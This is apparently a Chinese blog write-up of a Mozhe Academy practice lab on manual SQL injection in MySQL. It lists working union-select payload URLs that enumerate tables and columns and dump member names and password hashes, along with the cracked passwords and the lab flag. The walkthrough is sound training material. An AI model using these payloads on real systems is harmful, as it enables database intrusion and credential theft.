墨者学院SQL手工注入漏洞测试(MySQL数据库)的wp

链接: https://www.mozhe.cn/bug/detail/elRHc1BCd2VIckQxbjduMG9BVCtkZz09bW96aGUmozhe

1.判断是否存在爆破点:
http://124.70.64.48:46855/new_list.php?id=1dfddsvs
返回错误,id后的输入数据被处理,表示存在注入点

2.猜解列名数量(猜字段): order by x 错误与正常的过渡值
http://124.70.64.48:46855/new_list.php?id=1 order by 4

3.查找注入通道:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,2,3,4
返回值为2,3(可注入通道)

4.查询数据库的用户名,版本,名字,系统:
user()                           root@localhost
version()                          5.7.22-0ubuntu0.16.04.1
database()                   mozhe_Discuz_StormGroup
@@version_compile_os  Linux

扩展:
数据库版本在5.0以上算高版本,采用information_schema有据查询,低版本采用暴力查询
原因:版本在5.0以上的数据库存在一个数据库名为information_schema存储有数据库名,表名,列名

5.查询数据库下的所有表名:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27
结果:StormGroup_member,notice

6.查询StormGroup_member表名下的所有列名:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27
结果:id,name,password,status

7.查询StormGroup_member表名下的具体数据:
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%200,1
结果:mozhe     356f589a7df439f6f744ff19bb8092c0(解密得:dsan13)
http://124.70.64.48:46855/new_list.php?id=-1%20union%20select%201,name,password,4%20from%20StormGroup_member%20limit%201,1
结果;mozhe     0b3f116b287a258c0c75d8c5a3849fb3(解密得:844201)

8.尝试两个账户,得出flag
mozhe4f4b6c8f3a81a57fdb361d321d0

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值